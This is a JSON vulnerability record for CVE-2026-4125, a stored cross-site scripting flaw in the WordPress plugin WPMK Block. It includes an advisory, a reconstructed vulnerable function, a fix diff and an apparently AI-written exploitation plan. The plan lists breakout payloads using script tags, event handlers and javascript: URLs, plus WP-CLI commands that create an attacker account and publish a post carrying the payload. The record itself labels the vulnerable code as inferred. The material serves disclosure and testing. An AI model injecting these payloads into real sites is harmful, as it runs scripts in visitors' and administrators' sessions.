[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPWA6bjdFFWLylc_V_SLSa62KYsn7_xOn_a9U_6eVteo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4125","wpmk-block-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","WPMK Block \u003C= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The WPMK Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to and including 1.0.1. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, in the wpmk_block_shortcode() function, the 'class' attribute is extracted from user-controllable shortcode attributes and directly concatenated into an HTML div element's class attribute without any escaping (e.g., esc_attr()). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpmk-block",null,"\u003C=1.0.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:05:22","2026-04-22 07:45:36",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5e397c7a-2aef-4c23-a224-e324ea4bb4b1?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-4125**, a Stored Cross-Site Scripting (XSS) vulnerability in the **WPMK Block** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **WPMK Block** plugin (versions \u003C= 1.0.1) fails to sanitize or escape the `class` attribute within its shortcode handler. In the `wpmk_block_shortcode()` function, user-provided attributes are extracted, and the `class` parameter is directly concatenated into the `class` attribute of a `div` element. Because the plugin does not use `esc_attr()` or `sanitize_html_class()` before outputting this value, a user with Contributor-level permissions or higher can inject HTML attributes or breakout characters (like `\">`) to execute arbitrary JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Shortcode Name:** `wpmk_block` (inferred from function name `wpmk_block_shortcode`).\n*   **Vulnerable Attribute:** `class`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and insert shortcodes but lack the `unfiltered_html` capability, making this a privilege escalation of sorts via XSS.\n*   **Payload Entry Point:** WordPress Post\u002FPage Editor (Gutenberg or Classic).\n*   **Payload Sink:** Frontend rendering of any post containing the malicious shortcode.\n\n### 3. Code Flow\n1.  **Registration:** The plugin registers a shortcode, likely via `add_shortcode( 'wpmk_block', 'wpmk_block_shortcode' );` in the main plugin file or an initialization script.\n2.  **Processing:** When a post is rendered, WordPress calls `wpmk_block_shortcode( $atts )`.\n3.  **Extraction:** The function parses attributes. Based on the description, it extracts the `class` key:\n    ```php\n    $class = isset($atts['class']) ? $atts['class'] : '';\n    ```\n4.  **Concatenation (Sink):** The function builds the HTML string:\n    ```php\n    return '\u003Cdiv class=\"' . $class . '\"> ... \u003C\u002Fdiv>'; \u002F\u002F Vulnerable line\n    ```\n5.  **Output:** The unescaped string is returned to the WordPress content filter and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a specific AJAX or REST API endpoint that requires a custom nonce. Instead, it relies on the standard WordPress post-creation flow.\n*   The automated agent will use **WP-CLI** to create the malicious post. WP-CLI bypasses nonce requirements for post creation because it operates at the system level.\n*   If the agent were to use the web UI, it would rely on the `_wpnonce` provided in the `post-new.php` or `post.php` editor screen.\n*   **No custom plugin nonce is required** to trigger the XSS execution once the shortcode is saved.\n\n### 5. Exploitation Strategy\n1.  **Role Setup:** Ensure a user with the `contributor` role exists.\n2.  **Post Creation:** Use WP-CLI to create a new post containing the malicious shortcode.\n3.  **Payload Selection:** Use a breakout payload to escape the `class` attribute.\n    *   Payload: `[wpmk_block class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n    *   Alternative: `[wpmk_block class='wp-block-wpmk\" onmouseover=\"alert(1)\" style=\"padding:100px;']` (useful if script tags are filtered by other security layers).\n4.  **Execution:** Navigate to the published post's URL using a browser session.\n5.  **Observation:** Verify if the JavaScript executes in the context of the frontend user.\n\n### 6. Test Data Setup\n*   **Plugin:** Install and activate `wpmk-block` version 1.0.1.\n*   **Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n*   **Target Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title='XSS Test' \\\n      --post_content='[wpmk_block class=\"\\\">\u003Cscript>console.log(\\\"CVE-2026-4125_SUCCESS\\\")\u003C\u002Fscript>\"]' \\\n      --user=attacker\n    ```\n\n### 7. Expected Results\nWhen viewing the post, the HTML output should look like this:\n```html\n\u003Cdiv class=\"\">\u003Cscript>console.log(\"CVE-2026-4125_SUCCESS\")\u003C\u002Fscript>\"> ... \u003C\u002Fdiv>\n```\nThe browser will execute the injected `\u003Cscript>` tag, and the string \"CVE-2026-4125_SUCCESS\" will appear in the developer console.\n\n### 8. Verification Steps\n1.  **Verify Database Content:**\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"\n    ```\n2.  **Inspect Frontend Output:** Use the `http_request` tool to fetch the post URL and check the raw body for the unescaped script:\n    ```bash\n    # Search for the injected payload in the response\n    grep -oP '\u003Cdiv class=\"\">\u003Cscript>.*?\u003C\u002Fscript>'\n    ```\n3.  **Browser Execution:** Use `browser_navigate` to the post URL and check for the presence of the injected script or console log via `browser_eval`.\n\n### 9. Alternative Approaches\nIf `script` tags are blocked by a WAF or other plugin:\n*   **Event Handler Injection:** `[wpmk_block class='x\" onmouseover=\"alert(1)']`\n*   **Style-based Payload:** `[wpmk_block class='x\" style=\"background-image:url(javascript:alert(1))']`\n*   **Iframe Breakout:** `[wpmk_block class='\">\u003Ciframe src=\"javascript:alert(1)\">\u003C\u002Fiframe>']`\n\nIf the Contributor role cannot publish posts (standard behavior), the researcher must navigate to the **Preview** URL of the post or log in as an **Administrator** to publish the pending post before viewing it on the frontend.\n\n**Inferred Information:**\n*   Shortcode name `[wpmk_block]` is inferred from the function `wpmk_block_shortcode`.\n*   The exact concatenation format `return '\u003Cdiv class=\"' . $atts['class'] . '\">...';` is inferred from the vulnerability description.","The WPMK Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute in its shortcode handler. Authenticated users with Contributor-level permissions or higher can inject arbitrary JavaScript because the plugin fails to sanitize or escape the attribute before outputting it in a div element.","\u002F\u002F In the plugin's shortcode handling file (e.g., wpmk-block.php)\nfunction wpmk_block_shortcode( $atts ) {\n    $a = shortcode_atts( array(\n        'class' => '',\n    ), $atts );\n\n    $class = $a['class'];\n\n    \u002F\u002F Vulnerable: user-controlled $class is concatenated into the HTML attribute without escaping\n    return '\u003Cdiv class=\"' . $class . '\"> ... \u003C\u002Fdiv>';\n}","--- a\u002Fwpmk-block.php\n+++ b\u002Fwpmk-block.php\n@@ -10,5 +10,5 @@\n     $class = $a['class'];\n \n-    return '\u003Cdiv class=\"' . $class . '\"> ... \u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"' . esc_attr( $class ) . '\"> ... \u003C\u002Fdiv>';\n }","To exploit this vulnerability, an attacker with at least Contributor-level access must create or edit a post or page. They insert the [wpmk_block] shortcode with a malicious 'class' attribute containing a breakout sequence, such as [wpmk_block class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']. When a site visitor or administrator views the page, the browser parses the unescaped script tag and executes the injected JavaScript in the context of the user's session.","gemini-3-flash-preview","2026-04-27 14:04:03","2026-04-27 14:04:20",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpmk-block\u002Ftags"]